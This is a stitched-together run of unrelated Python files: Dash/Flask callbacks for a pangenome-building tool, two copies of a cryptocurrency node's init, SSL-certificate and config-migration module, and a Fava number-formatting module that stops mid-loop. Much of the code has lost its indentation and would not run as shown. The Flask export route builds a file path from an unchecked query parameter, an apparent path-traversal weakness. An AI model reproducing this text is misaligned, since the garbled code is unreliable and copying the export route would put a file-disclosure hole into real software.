session_dir = Path(session_dir)
current_processing_output_dir_name = tools.get_child_path(session_dir, tools.get_current_time())
tools.create_dir(current_processing_output_dir_name)
if multialignment_filename and "maf" in multialignment_filename:
multialignment = Maf(StringIO(tools.decode_content(multialignment_content)),
file_name=multialignment_filename)
elif multialignment_filename and "po" in multialignment_filename:
multialignment = Po(StringIO(tools.decode_content(multialignment_content)),
file_name=multialignment_filename)
else:
session_state["error"] = "Cannot create Poagraph. Only MAF and PO files are supported."
return session_state
missing_symbol = MissingBase(missing_symbol) if missing_symbol != "" else MissingBase()
fasta_path = None
if fasta_provider_choice == "NCBI":
fasta_provider = FromNCBI(use_cache=True)
elif fasta_provider_choice == "File":
fasta_path = tools.get_child_path(current_processing_output_dir_name,
fasta_filename).resolve()
save_mode = "wb" if "zip" in fasta_filename else "w"
if "zip" in fasta_filename:
fasta_decoded_content = tools.decode_zip_content(fasta_content)
else:
fasta_decoded_content = tools.decode_content(fasta_content)
tools.save_to_file(fasta_decoded_content, fasta_path, save_mode)
fasta_provider = FromFile(fasta_path)
blosum_path = pangtreebuild.get_default_blosum_path()
blosum_contents = tools.read_file_to_stream(blosum_path)
blosum = Blosum(blosum_contents, blosum_path)
metadata = MetadataCSV(StringIO(tools.decode_content(metadata_content)),
metadata_filename) if metadata_content else None
pangenomejson = pangtreebuild.run_pangtreebuild(
output_dir=current_processing_output_dir_name,
datatype=DataType[datatype],
multialignment=multialignment,
fasta_provider=fasta_provider,
blosum=blosum,
consensus_choice=consensus_choice,
output_po=True if "po" in output_config else False,
output_fasta=True if "fasta" in output_config else False,
output_newick=True if "newick" in output_config else False,
missing_symbol=missing_symbol,
metadata=metadata,
hbmin=Hbmin(hbmin_value) if hbmin_value else None,
stop=Stop(stop_value) if stop_value else None,
p=P(p_value) if p_value else None,
fasta_path=fasta_filename if fasta_filename else None,
include_nodes=True # if "nodes" in output_config else False
)
pangenome_json_str = to_json(pangenomejson)
current_processing_output_zip = tools.dir_to_zip(current_processing_output_dir_name)
current_processing_short_name = "/".join(str(current_processing_output_zip).split("/")[-2:])
return {"last_output_zip": current_processing_short_name,
"jsonpangenome": pangenome_json_str,
"error": ""}, True
@app.callback(Output("download_processing_result", "href"),
[Input("session_state", 'data')])
def update_download_result_content(session_state_data):
if session_state_data is None:
raise PreventUpdate()
if not "last_output_zip" in session_state_data:
return ""
return f'/export/pang?n={session_state_data["last_output_zip"]}'
@app.server.route('/export/pang')
def export_pang_result_zip():
zip_short_path = flask.request.args.get('n')
zip_full_path = Path(os.path.abspath(os.path.join(os.path.dirname(__file__)))).joinpath(
"../../users_temp_data/").joinpath(zip_short_path)
with open(zip_full_path, 'rb') as f:
data = io.BytesIO(f.read())
data.seek(0)
result_id = zip_short_path.split("/")[1]
return flask.send_file(
data,
mimetype='application/zip',
attachment_filename=f'result_{result_id}',
as_attachment=True,
cache_timeout=0
)
@app.callback(Output("poapangenome_result", "is_open"),
[Input("session_state", 'data')])
def open_poapangenome_result(session_state_data):
if session_state_data is None or "jsonpangenome" not in session_state_data:
return False
return True
@app.callback(Output("poapangenome_result_description", "children"),
[Input("session_state", 'data')])
def get_poapangenome_result_description(session_state_data):
if session_state_data is None or "jsonpangenome" not in session_state_data:
return []
jsonpangenome = tools.unjsonify_jsonpangenome(session_state_data["jsonpangenome"])
poapangenome_task_description = get_task_description_layout(jsonpangenome)
return poapangenome_task_description
@app.callback(Output("result_icon", "className"),
[Input("session_state", 'data')])
def get_poapangenome_result_description(session_state_data):
if session_state_data is None or "jsonpangenome" not in session_state_data:
return ""
if session_state_data["error"]:
return "fas fa-times-circle incorrect"
else:
return "fas fa-check-circle correct"
|
import os
import shutil
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
import yaml
from cryptodoge import __version__
from cryptodoge.consensus.coinbase import create_puzzlehash_for_pk
from cryptodoge.ssl.create_ssl import generate_ca_signed_cert, get_cryptodoge_ca_crt_key, make_ca_cert
from cryptodoge.util.bech32m import encode_puzzle_hash
from cryptodoge.util.config import (
create_default_cryptodoge_config,
initial_config_file,
load_config,
save_config,
unflatten_properties,
)
from cryptodoge.util.ints import uint32
from cryptodoge.util.keychain import Keychain
from cryptodoge.util.path import mkdir
from cryptodoge.wallet.derive_keys import master_sk_to_pool_sk, master_sk_to_wallet_sk
# Service names whose TLS certificates are signed by the node-local private CA
# (see generate_ssl_for_nodes(..., private=True)).
private_node_names = {"full_node", "wallet", "farmer", "harvester", "timelord", "daemon"}
# Service names whose TLS certificates are signed by the shared cryptodoge CA.
public_node_names = {"full_node", "wallet", "farmer", "introducer", "timelord"}
def dict_add_new_default(updated: Dict, default: Dict, do_not_migrate_keys: Dict[str, Any]):
    """Recursively merge missing ``default`` entries into ``updated`` in place.

    ``do_not_migrate_keys`` marks settings that must be taken from the
    defaults: a key mapped to "" has its old value dropped and replaced,
    while a key mapped to a dict applies the rule recursively to that
    subtree only.
    """
    # First drop every value the caller explicitly refuses to migrate.
    for key in do_not_migrate_keys:
        if key in updated and do_not_migrate_keys[key] == "":
            updated.pop(key)
    for key, default_value in default.items():
        # A non-dict marker means "always take the default for this key".
        force_default = (key in do_not_migrate_keys
                         and not isinstance(do_not_migrate_keys[key], dict))
        if isinstance(default_value, dict) and key in updated and not force_default:
            # An intermediate "" marker blocks migration of all descendants.
            if do_not_migrate_keys.get(key, None) == "":
                do_not_migrate_keys[key] = default_value
            dict_add_new_default(updated[key], default[key],
                                 do_not_migrate_keys.get(key, {}))
        elif key not in updated or force_default:
            updated[key] = default_value
def check_keys(new_root: Path) -> None:
    """Fill farmer/pool reward addresses and pool keys from the keychain.

    Derives the first ``number_of_ph_to_search`` wallet addresses per stored
    key, sets missing xcd_target_address entries to the first derived
    address, warns when a configured address is not among the derived ones,
    merges the keychain's pool public keys into the farmer config, and
    saves config.yaml.
    """
    keychain: Keychain = Keychain()
    all_sks = keychain.get_all_private_keys()
    if len(all_sks) == 0:
        print("No keys are present in the keychain. Generate them with 'cryptodoge keys generate'")
        return None
    config: Dict = load_config(new_root, "config.yaml")
    pool_child_pubkeys = [master_sk_to_pool_sk(sk).get_g1() for sk, _ in all_sks]
    all_targets = []
    stop_searching_for_farmer = "xcd_target_address" not in config["farmer"]
    stop_searching_for_pool = "xcd_target_address" not in config["pool"]
    number_of_ph_to_search = 500
    selected = config["selected_network"]
    prefix = config["network_overrides"]["config"][selected]["address_prefix"]
    for i in range(number_of_ph_to_search):
        # Always derive index 0 so all_targets[0] exists for the defaults.
        if stop_searching_for_farmer and stop_searching_for_pool and i > 0:
            break
        for sk, _ in all_sks:
            all_targets.append(
                encode_puzzle_hash(create_puzzlehash_for_pk(master_sk_to_wallet_sk(sk, uint32(i)).get_g1()), prefix)
            )
            if all_targets[-1] == config["farmer"].get("xcd_target_address"):
                stop_searching_for_farmer = True
            if all_targets[-1] == config["pool"].get("xcd_target_address"):
                stop_searching_for_pool = True
    # Set the destinations
    if "xcd_target_address" not in config["farmer"]:
        print(f"Setting the xcd destination address for coinbase fees reward to {all_targets[0]}")
        config["farmer"]["xcd_target_address"] = all_targets[0]
    elif config["farmer"]["xcd_target_address"] not in all_targets:
        print(
            f"WARNING: using a farmer address which we don't have the private"
            f" keys for. We searched the first {number_of_ph_to_search} addresses. Consider overriding "
            # BUG FIX: the original nested double quotes inside a
            # double-quoted f-string — a SyntaxError before Python 3.12.
            f"{config['farmer']['xcd_target_address']} with {all_targets[0]}"
        )
    if "pool" not in config:
        config["pool"] = {}
    if "xcd_target_address" not in config["pool"]:
        print(f"Setting the xcd destination address for coinbase reward to {all_targets[0]}")
        config["pool"]["xcd_target_address"] = all_targets[0]
    elif config["pool"]["xcd_target_address"] not in all_targets:
        print(
            f"WARNING: using a pool address which we don't have the private"
            f" keys for. We searched the first {number_of_ph_to_search} addresses. Consider overriding "
            # BUG FIX: same invalid quote nesting as the farmer warning above.
            f"{config['pool']['xcd_target_address']} with {all_targets[0]}"
        )
    # Set the pool pks in the farmer
    pool_pubkeys_hex = {bytes(pk).hex() for pk in pool_child_pubkeys}
    if "pool_public_keys" in config["farmer"]:
        # Keep any keys that were already configured.
        for pk_hex in config["farmer"]["pool_public_keys"]:
            pool_pubkeys_hex.add(pk_hex)
    config["farmer"]["pool_public_keys"] = pool_pubkeys_hex
    save_config(new_root, "config.yaml", config)
def copy_files_rec(old_path: Path, new_path: Path):
    """Recursively copy a file or directory tree, printing each target path."""
    if old_path.is_file():
        print(f"{new_path}")
        # Make sure the destination's parent directory exists before copying.
        mkdir(new_path.parent)
        shutil.copy(old_path, new_path)
    elif old_path.is_dir():
        for child in old_path.iterdir():
            copy_files_rec(child, new_path / child.name)
def migrate_from(
    old_root: Path,
    new_root: Path,
    manifest: List[str],
    do_not_migrate_settings: List[str],
):
    """
    Copy all the files in "manifest" to the new config directory.

    Returns 0 when old_root does not exist; returns 1 both when the two
    roots are identical (nothing to do) and after a migration.  After
    copying, new default config keys are merged in (respecting
    do_not_migrate_settings) and the SSL certificate tree is regenerated.
    """
    if old_root == new_root:
        print("same as new path, exiting")
        return 1
    if not old_root.is_dir():
        print(f"{old_root} not found - this is ok if you did not install this version")
        return 0
    print(f"\n{old_root} found")
    print(f"Copying files from {old_root} to {new_root}\n")
    for f in manifest:
        old_path = old_root / f
        new_path = new_root / f
        copy_files_rec(old_path, new_path)
    # update config yaml with new keys
    config: Dict = load_config(new_root, "config.yaml")
    config_str: str = initial_config_file("config.yaml")
    default_config: Dict = yaml.safe_load(config_str)
    # Dotted setting names become nested dicts with "" leaves — the marker
    # dict_add_new_default treats as "take the default, do not migrate".
    flattened_keys = unflatten_properties({k: "" for k in do_not_migrate_settings})
    dict_add_new_default(config, default_config, flattened_keys)
    save_config(new_root, "config.yaml", config)
    create_all_ssl(new_root)
    return 1
def create_all_ssl(root: Path):
    """Create the SSL directory layout and all TLS certificates under `root`.

    Removes legacy trusted.key/trusted.crt, rewrites the shared cryptodoge CA
    files (unconditionally, on every call), creates a private CA when one is
    not present, then generates per-node certs: private services signed by the
    private CA (always overwritten), public services signed by the cryptodoge
    CA (existing pairs kept).
    """
    # remove old key and crt
    config_dir = root / "config"
    old_key_path = config_dir / "trusted.key"
    old_crt_path = config_dir / "trusted.crt"
    if old_key_path.exists():
        print(f"Old key not needed anymore, deleting {old_key_path}")
        os.remove(old_key_path)
    if old_crt_path.exists():
        print(f"Old crt not needed anymore, deleting {old_crt_path}")
        os.remove(old_crt_path)
    ssl_dir = config_dir / "ssl"
    if not ssl_dir.exists():
        ssl_dir.mkdir()
    ca_dir = ssl_dir / "ca"
    if not ca_dir.exists():
        ca_dir.mkdir()
    private_ca_key_path = ca_dir / "private_ca.key"
    private_ca_crt_path = ca_dir / "private_ca.crt"
    cryptodoge_ca_crt, cryptodoge_ca_key = get_cryptodoge_ca_crt_key()
    cryptodoge_ca_crt_path = ca_dir / "cryptodoge_ca.crt"
    cryptodoge_ca_key_path = ca_dir / "cryptodoge_ca.key"
    cryptodoge_ca_crt_path.write_bytes(cryptodoge_ca_crt)
    cryptodoge_ca_key_path.write_bytes(cryptodoge_ca_key)
    if not private_ca_key_path.exists() or not private_ca_crt_path.exists():
        # Create private CA
        print(f"Can't find private CA, creating a new one in {root} to generate TLS certificates")
        make_ca_cert(private_ca_crt_path, private_ca_key_path)
    else:
        # This is entered when user copied over private CA
        print(f"Found private CA in {root}, using it to generate TLS certificates")
    # Both branches previously duplicated these steps verbatim; do them once.
    ca_key = private_ca_key_path.read_bytes()
    ca_crt = private_ca_crt_path.read_bytes()
    generate_ssl_for_nodes(ssl_dir, ca_crt, ca_key, True)
    cryptodoge_ca_crt, cryptodoge_ca_key = get_cryptodoge_ca_crt_key()
    generate_ssl_for_nodes(ssl_dir, cryptodoge_ca_crt, cryptodoge_ca_key, False, overwrite=False)
def generate_ssl_for_nodes(ssl_dir: Path, ca_crt: bytes, ca_key: bytes, private: bool, overwrite=True):
    """Create a CA-signed key/cert pair for each node of the chosen visibility.

    `private` selects both the node-name set and the filename prefix.
    Existing key/cert pairs are left untouched when overwrite is False.
    """
    prefix = "private" if private else "public"
    for node_name in (private_node_names if private else public_node_names):
        node_dir = ssl_dir / node_name
        if not node_dir.exists():
            node_dir.mkdir()
        key_path = node_dir / f"{prefix}_{node_name}.key"
        crt_path = node_dir / f"{prefix}_{node_name}.crt"
        if overwrite is False and key_path.exists() and crt_path.exists():
            continue
        generate_ca_signed_cert(ca_crt, ca_key, crt_path, key_path)
def copy_cert_files(cert_path: Path, new_path: Path):
    """Copy every *.crt and *.key file found under `cert_path` into `new_path`."""
    for pattern in ("*.crt", "*.key"):
        for src in cert_path.glob(pattern):
            copy_files_rec(src, new_path / src.name)
def init(create_certs: Optional[Path], root_path: Path):
    """Entry point for `cryptodoge init`.

    With create_certs set: installs that CA directory into
    root_path/config/ssl/ca (replacing any existing CA) and regenerates all
    node certificates; root_path is created first via cryptodoge_init when
    missing, returning -1 if creation fails.
    Without create_certs: delegates to cryptodoge_init and returns its result.
    """
    if create_certs is not None:
        if root_path.exists():
            if os.path.isdir(create_certs):
                ca_dir: Path = root_path / "config/ssl/ca"
                if ca_dir.exists():
                    # Replace, never merge, an existing CA directory.
                    print(f"Deleting your OLD CA in {ca_dir}")
                    shutil.rmtree(ca_dir)
                print(f"Copying your CA from {create_certs} to {ca_dir}")
                copy_cert_files(create_certs, ca_dir)
                create_all_ssl(root_path)
            else:
                print(f"** Directory {create_certs} does not exist **")
        else:
            print(f"** {root_path} does not exist. Executing core init **")
            # sanity check here to prevent infinite recursion
            if cryptodoge_init(root_path) == 0 and root_path.exists():
                return init(create_certs, root_path)
            print(f"** {root_path} was not created. Exiting **")
            return -1
    else:
        return cryptodoge_init(root_path)
def cryptodoge_version_number() -> Tuple[str, str, str, str]:
    """Split __version__ into (major, minor, patch, dev) display strings.

    Beta ("0b") and release-candidate ("0rc") minor components are remapped
    into a different numbering scheme. NOTE(review): the "1 - major"
    arithmetic looks deliberate but surprising - confirm against the release
    numbering scheme before changing it.
    """
    scm_full_version = __version__
    # Strip any PEP 440 local-version suffix ("+...") before splitting on dots.
    left_full_version = scm_full_version.split("+")
    version = left_full_version[0].split(".")
    scm_major_version = version[0]
    scm_minor_version = version[1]
    if len(version) > 2:
        smc_patch_version = version[2]
        patch_release_number = smc_patch_version
    else:
        smc_patch_version = ""
    major_release_number = scm_major_version
    minor_release_number = scm_minor_version
    dev_release_number = ""
    # If this is a beta dev release - get which beta it is
    if "0b" in scm_minor_version:
        original_minor_ver_list = scm_minor_version.split("0b")
        major_release_number = str(1 - int(scm_major_version))  # decrement the major release for beta
        minor_release_number = scm_major_version
        patch_release_number = original_minor_ver_list[1]
        if smc_patch_version and "dev" in smc_patch_version:
            dev_release_number = "." + smc_patch_version
    elif "0rc" in version[1]:
        original_minor_ver_list = scm_minor_version.split("0rc")
        major_release_number = str(1 - int(scm_major_version))  # decrement the major release for release candidate
        minor_release_number = str(int(scm_major_version) + 1)  # RC is 0.2.1 for RC 1
        patch_release_number = original_minor_ver_list[1]
        if smc_patch_version and "dev" in smc_patch_version:
            dev_release_number = "." + smc_patch_version
    else:
        major_release_number = scm_major_version
        minor_release_number = scm_minor_version
        patch_release_number = smc_patch_version
        dev_release_number = ""
    # install_release_number is assembled below but never returned or printed
    # from this function; kept for parity with the original code.
    install_release_number = major_release_number + "." + minor_release_number
    if len(patch_release_number) > 0:
        install_release_number += "." + patch_release_number
    if len(dev_release_number) > 0:
        install_release_number += dev_release_number
    return major_release_number, minor_release_number, patch_release_number, dev_release_number
def cryptodoge_minor_release_number():
    # NOTE(review): despite the name, index 2 of the version tuple is the
    # *patch* component, and the message calls it the "Install release
    # number" - confirm which component callers actually expect.
    res = int(cryptodoge_version_number()[2])
    print(f"Install release number: {res}")
    return res
def cryptodoge_full_version_str() -> str:
    """Return the full version string, e.g. "1.2.3" or "1.2.3.dev4".

    The dev component already carries its leading "." when present.
    """
    major, minor, patch, dev = cryptodoge_version_number()
    return ".".join((major, minor, patch)) + dev
def cryptodoge_init(root_path: Path):
    """Initialize config, SSL material and keys under `root_path`.

    Returns -1 when a config.yaml already exists (only check_keys is run);
    returns 0 after a fresh initialization.
    """
    if os.environ.get("CRYPTODOGE_ROOT", None) is not None:
        # Bug fix: the f-string reused double quotes inside a double-quoted
        # literal ({os.environ["CRYPTODOGE_ROOT"]}), a SyntaxError before
        # Python 3.12.
        print(
            f"warning, your CRYPTODOGE_ROOT is set to {os.environ['CRYPTODOGE_ROOT']}. "
            f"Please unset the environment variable and run cryptodoge init again\n"
            f"or manually migrate config.yaml"
        )
    print(f"Cryptodoge directory {root_path}")
    if root_path.is_dir() and Path(root_path / "config" / "config.yaml").exists():
        # This is reached if CRYPTODOGE_ROOT is set, or if user has run cryptodoge init twice
        # before a new update.
        check_keys(root_path)
        print(f"{root_path} already exists, no migration action taken")
        return -1
    create_default_cryptodoge_config(root_path)
    create_all_ssl(root_path)
    check_keys(root_path)
    print("")
    print("To see your keys, run 'cryptodoge keys show --show-mnemonic-seed'")
    return 0
| import os
import shutil
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
import yaml
from cryptodoge import __version__
from cryptodoge.consensus.coinbase import create_puzzlehash_for_pk
from cryptodoge.ssl.create_ssl import generate_ca_signed_cert, get_cryptodoge_ca_crt_key, make_ca_cert
from cryptodoge.util.bech32m import encode_puzzle_hash
from cryptodoge.util.config import (
create_default_cryptodoge_config,
initial_config_file,
load_config,
save_config,
unflatten_properties,
)
from cryptodoge.util.ints import uint32
from cryptodoge.util.keychain import Keychain
from cryptodoge.util.path import mkdir
from cryptodoge.wallet.derive_keys import master_sk_to_pool_sk, master_sk_to_wallet_sk
private_node_names = {"full_node", "wallet", "farmer", "harvester", "timelord", "daemon"}
public_node_names = {"full_node", "wallet", "farmer", "introducer", "timelord"}
def dict_add_new_default(updated: Dict, default: Dict, do_not_migrate_keys: Dict[str, Any]):
    """Merge new keys from `default` into `updated`, in place.

    A key mapped to "" in do_not_migrate_keys is dropped from `updated` first
    so the default value wins; any other non-dict marker also forces the
    default; a dict-valued marker recurses into that subtree.
    """
    # Pass 1: drop keys explicitly marked with "" so defaults repopulate them.
    for marked_key in do_not_migrate_keys:
        if do_not_migrate_keys[marked_key] == "" and marked_key in updated:
            updated.pop(marked_key)
    # Pass 2: walk the defaults and fill in whatever is missing or forced.
    for key, value in default.items():
        marker = do_not_migrate_keys.get(key)
        force_default = key in do_not_migrate_keys and not isinstance(marker, dict)
        if isinstance(value, dict) and key in updated and not force_default:
            # If there is an intermediate key with empty string value, do not
            # migrate any of its descendants either.
            if do_not_migrate_keys.get(key, None) == "":
                do_not_migrate_keys[key] = value
            dict_add_new_default(updated[key], default[key], do_not_migrate_keys.get(key, {}))
        elif key not in updated or force_default:
            updated[key] = value
def check_keys(new_root: Path) -> None:
    """Sync config.yaml under `new_root` with the keys in the OS keychain.

    Fills in farmer/pool xcd_target_address from the first derived wallet
    address when unset, warns when a configured address is not among the
    first 500 derived addresses, merges all pool public keys into
    farmer.pool_public_keys, and saves the updated config. No-op (with a
    hint) when the keychain is empty.
    """
    keychain: Keychain = Keychain()
    all_sks = keychain.get_all_private_keys()
    if len(all_sks) == 0:
        print("No keys are present in the keychain. Generate them with 'cryptodoge keys generate'")
        return None
    config: Dict = load_config(new_root, "config.yaml")
    pool_child_pubkeys = [master_sk_to_pool_sk(sk).get_g1() for sk, _ in all_sks]
    all_targets = []
    stop_searching_for_farmer = "xcd_target_address" not in config["farmer"]
    # NOTE(review): this KeyErrors if "pool" is missing from config, even
    # though the code further down guards `if "pool" not in config` - confirm
    # the config always has a "pool" section by this point.
    stop_searching_for_pool = "xcd_target_address" not in config["pool"]
    number_of_ph_to_search = 500
    selected = config["selected_network"]
    prefix = config["network_overrides"]["config"][selected]["address_prefix"]
    # Derive up to 500 addresses per key, stopping early once both configured
    # target addresses have been found among the derived ones.
    for i in range(number_of_ph_to_search):
        if stop_searching_for_farmer and stop_searching_for_pool and i > 0:
            break
        for sk, _ in all_sks:
            all_targets.append(
                encode_puzzle_hash(create_puzzlehash_for_pk(master_sk_to_wallet_sk(sk, uint32(i)).get_g1()), prefix)
            )
            if all_targets[-1] == config["farmer"].get("xcd_target_address"):
                stop_searching_for_farmer = True
            if all_targets[-1] == config["pool"].get("xcd_target_address"):
                stop_searching_for_pool = True
    # Set the destinations
    if "xcd_target_address" not in config["farmer"]:
        print(f"Setting the xcd destination address for coinbase fees reward to {all_targets[0]}")
        config["farmer"]["xcd_target_address"] = all_targets[0]
    elif config["farmer"]["xcd_target_address"] not in all_targets:
        print(
            f"WARNING: using a farmer address which we don't have the private"
            f" keys for. We searched the first {number_of_ph_to_search} addresses. Consider overriding "
            f"{config['farmer']['xcd_target_address']} with {all_targets[0]}"
        )
    if "pool" not in config:
        config["pool"] = {}
    if "xcd_target_address" not in config["pool"]:
        print(f"Setting the xcd destination address for coinbase reward to {all_targets[0]}")
        config["pool"]["xcd_target_address"] = all_targets[0]
    elif config["pool"]["xcd_target_address"] not in all_targets:
        print(
            f"WARNING: using a pool address which we don't have the private"
            f" keys for. We searched the first {number_of_ph_to_search} addresses. Consider overriding "
            f"{config['pool']['xcd_target_address']} with {all_targets[0]}"
        )
    # Set the pool pks in the farmer
    pool_pubkeys_hex = set(bytes(pk).hex() for pk in pool_child_pubkeys)
    if "pool_public_keys" in config["farmer"]:
        for pk_hex in config["farmer"]["pool_public_keys"]:
            # Add original ones in config
            pool_pubkeys_hex.add(pk_hex)
    config["farmer"]["pool_public_keys"] = pool_pubkeys_hex
    save_config(new_root, "config.yaml", config)
def copy_files_rec(old_path: Path, new_path: Path):
if old_path.is_file():
print(f"{new_path}")
mkdir(new_path.parent)
shutil.copy(old_path, new_path)
elif old_path.is_dir():
for old_path_child in old_path.iterdir():
new_path_child = new_path / old_path_child.name
copy_files_rec(old_path_child, new_path_child)
def migrate_from(
old_root: Path,
new_root: Path,
manifest: List[str],
do_not_migrate_settings: List[str],
):
"""
Copy all the files in "manifest" to the new config directory.
"""
if old_root == new_root:
print("same as new path, exiting")
return 1
if not old_root.is_dir():
print(f"{old_root} not found - this is ok if you did not install this version")
return 0
print(f"\n{old_root} found")
print(f"Copying files from {old_root} to {new_root}\n")
for f in manifest:
old_path = old_root / f
new_path = new_root / f
copy_files_rec(old_path, new_path)
# update config yaml with new keys
config: Dict = load_config(new_root, "config.yaml")
config_str: str = initial_config_file("config.yaml")
default_config: Dict = yaml.safe_load(config_str)
flattened_keys = unflatten_properties({k: "" for k in do_not_migrate_settings})
dict_add_new_default(config, default_config, flattened_keys)
save_config(new_root, "config.yaml", config)
create_all_ssl(new_root)
return 1
def create_all_ssl(root: Path):
# remove old key and crt
config_dir = root / "config"
old_key_path = config_dir / "trusted.key"
old_crt_path = config_dir / "trusted.crt"
if old_key_path.exists():
print(f"Old key not needed anymore, deleting {old_key_path}")
os.remove(old_key_path)
if old_crt_path.exists():
print(f"Old crt not needed anymore, deleting {old_crt_path}")
os.remove(old_crt_path)
ssl_dir = config_dir / "ssl"
if not ssl_dir.exists():
ssl_dir.mkdir()
ca_dir = ssl_dir / "ca"
if not ca_dir.exists():
ca_dir.mkdir()
private_ca_key_path = ca_dir / "private_ca.key"
private_ca_crt_path = ca_dir / "private_ca.crt"
cryptodoge_ca_crt, cryptodoge_ca_key = get_cryptodoge_ca_crt_key()
cryptodoge_ca_crt_path = ca_dir / "cryptodoge_ca.crt"
cryptodoge_ca_key_path = ca_dir / "cryptodoge_ca.key"
cryptodoge_ca_crt_path.write_bytes(cryptodoge_ca_crt)
cryptodoge_ca_key_path.write_bytes(cryptodoge_ca_key)
if not private_ca_key_path.exists() or not private_ca_crt_path.exists():
# Create private CA
print(f"Can't find private CA, creating a new one in {root} to generate TLS certificates")
make_ca_cert(private_ca_crt_path, private_ca_key_path)
# Create private certs for each node
ca_key = private_ca_key_path.read_bytes()
ca_crt = private_ca_crt_path.read_bytes()
generate_ssl_for_nodes(ssl_dir, ca_crt, ca_key, True)
else:
# This is entered when user copied over private CA
print(f"Found private CA in {root}, using it to generate TLS certificates")
ca_key = private_ca_key_path.read_bytes()
ca_crt = private_ca_crt_path.read_bytes()
generate_ssl_for_nodes(ssl_dir, ca_crt, ca_key, True)
cryptodoge_ca_crt, cryptodoge_ca_key = get_cryptodoge_ca_crt_key()
generate_ssl_for_nodes(ssl_dir, cryptodoge_ca_crt, cryptodoge_ca_key, False, overwrite=False)
def generate_ssl_for_nodes(ssl_dir: Path, ca_crt: bytes, ca_key: bytes, private: bool, overwrite=True):
if private:
names = private_node_names
else:
names = public_node_names
for node_name in names:
node_dir = ssl_dir / node_name
if not node_dir.exists():
node_dir.mkdir()
if private:
prefix = "private"
else:
prefix = "public"
key_path = node_dir / f"{prefix}_{node_name}.key"
crt_path = node_dir / f"{prefix}_{node_name}.crt"
if key_path.exists() and crt_path.exists() and overwrite is False:
continue
generate_ca_signed_cert(ca_crt, ca_key, crt_path, key_path)
def copy_cert_files(cert_path: Path, new_path: Path):
for ext in "*.crt", "*.key":
for old_path_child in cert_path.glob(ext):
new_path_child = new_path / old_path_child.name
copy_files_rec(old_path_child, new_path_child)
def init(create_certs: Optional[Path], root_path: Path):
if create_certs is not None:
if root_path.exists():
if os.path.isdir(create_certs):
ca_dir: Path = root_path / "config/ssl/ca"
if ca_dir.exists():
print(f"Deleting your OLD CA in {ca_dir}")
shutil.rmtree(ca_dir)
print(f"Copying your CA from {create_certs} to {ca_dir}")
copy_cert_files(create_certs, ca_dir)
create_all_ssl(root_path)
else:
print(f"** Directory {create_certs} does not exist **")
else:
print(f"** {root_path} does not exist. Executing core init **")
# sanity check here to prevent infinite recursion
if cryptodoge_init(root_path) == 0 and root_path.exists():
return init(create_certs, root_path)
print(f"** {root_path} was not created. Exiting **")
return -1
else:
return cryptodoge_init(root_path)
def cryptodoge_version_number() -> Tuple[str, str, str, str]:
scm_full_version = __version__
left_full_version = scm_full_version.split("+")
version = left_full_version[0].split(".")
scm_major_version = version[0]
scm_minor_version = version[1]
if len(version) > 2:
smc_patch_version = version[2]
patch_release_number = smc_patch_version
else:
smc_patch_version = ""
major_release_number = scm_major_version
minor_release_number = scm_minor_version
dev_release_number = ""
# If this is a beta dev release - get which beta it is
if "0b" in scm_minor_version:
original_minor_ver_list = scm_minor_version.split("0b")
major_release_number = str(1 - int(scm_major_version)) # decrement the major release for beta
minor_release_number = scm_major_version
patch_release_number = original_minor_ver_list[1]
if smc_patch_version and "dev" in smc_patch_version:
dev_release_number = "." + smc_patch_version
elif "0rc" in version[1]:
original_minor_ver_list = scm_minor_version.split("0rc")
major_release_number = str(1 - int(scm_major_version)) # decrement the major release for release candidate
minor_release_number = str(int(scm_major_version) + 1) # RC is 0.2.1 for RC 1
patch_release_number = original_minor_ver_list[1]
if smc_patch_version and "dev" in smc_patch_version:
dev_release_number = "." + smc_patch_version
else:
major_release_number = scm_major_version
minor_release_number = scm_minor_version
patch_release_number = smc_patch_version
dev_release_number = ""
install_release_number = major_release_number + "." + minor_release_number
if len(patch_release_number) > 0:
install_release_number += "." + patch_release_number
if len(dev_release_number) > 0:
install_release_number += dev_release_number
return major_release_number, minor_release_number, patch_release_number, dev_release_number
def cryptodoge_minor_release_number():
res = int(cryptodoge_version_number()[2])
print(f"Install release number: {res}")
return res
def cryptodoge_full_version_str() -> str:
major, minor, patch, dev = cryptodoge_version_number()
return f"{major}.{minor}.{patch}{dev}"
def cryptodoge_init(root_path: Path):
if os.environ.get("CRYPTODOGE_ROOT", None) is not None:
print(
f"warning, your CRYPTODOGE_ROOT is set to {os.environ['CRYPTODOGE_ROOT']}. "
f"Please unset the environment variable and run cryptodoge init again\n"
f"or manually migrate config.yaml"
)
print(f"Cryptodoge directory {root_path}")
if root_path.is_dir() and Path(root_path / "config" / "config.yaml").exists():
# This is reached if CRYPTODOGE_ROOT is set, or if user has run cryptodoge init twice
# before a new update.
check_keys(root_path)
print(f"{root_path} already exists, no migration action taken")
return -1
create_default_cryptodoge_config(root_path)
create_all_ssl(root_path)
check_keys(root_path)
print("")
print("To see your keys, run 'cryptodoge keys show --show-mnemonic-seed'")
return 0
|
"""Formatting numbers."""
import copy
from typing import Dict
from babel.core import Locale # type: ignore
from babel.core import UnknownLocaleError
from beancount.core.display_context import Precision
from beancount.core.number import Decimal
from fava.core.fava_options import OptionError
from fava.core.module_base import FavaModule
class DecimalFormatModule(FavaModule):
    """Formatting numbers."""

    def __init__(self, ledger) -> None:
        super().__init__(ledger)
        # Babel Locale parsed from the "locale" option; None when unset or unknown.
        self.locale = None
        # Per-currency number patterns. NOTE(review): when a locale is active
        # the values are babel pattern objects, not str - the Dict[str, str]
        # hint is loose.
        self.patterns: Dict[str, str] = {}
        self.default_pattern = "{:.2f}"

    def load_file(self) -> None:
        """Rebuild locale and per-currency patterns from the ledger's options."""
        self.locale = None
        locale_option = self.ledger.fava_options["locale"]
        # render_commas implies at least the "en" locale for thousands separators.
        if self.ledger.options["render_commas"] and not locale_option:
            locale_option = "en"
            self.ledger.fava_options["locale"] = locale_option
        if locale_option:
            try:
                self.locale = Locale.parse(locale_option)
            except UnknownLocaleError:
                self.locale = None
                # Bug fix: the f-string reused double quotes inside a
                # double-quoted literal, a SyntaxError before Python 3.12.
                error = OptionError(
                    None,
                    f"Unknown locale: {self.ledger.fava_options['locale']}.",
                    None,
                )
                self.ledger.errors.append(error)
        if self.locale:
            # Copy the locale's decimal pattern and pin it to 2 fraction digits.
            self.default_pattern = copy.copy(
                self.locale.decimal_formats.get(None)
            )
            self.default_pattern.frac_prec = (2, 2)
        else:
            self.default_pattern = "{:.2f}"
        dcontext = self.ledger.options["dcontext"]
        for currency, ccontext in dcontext.ccontexts.items():
            # Use the most common fractional precision seen for this currency.
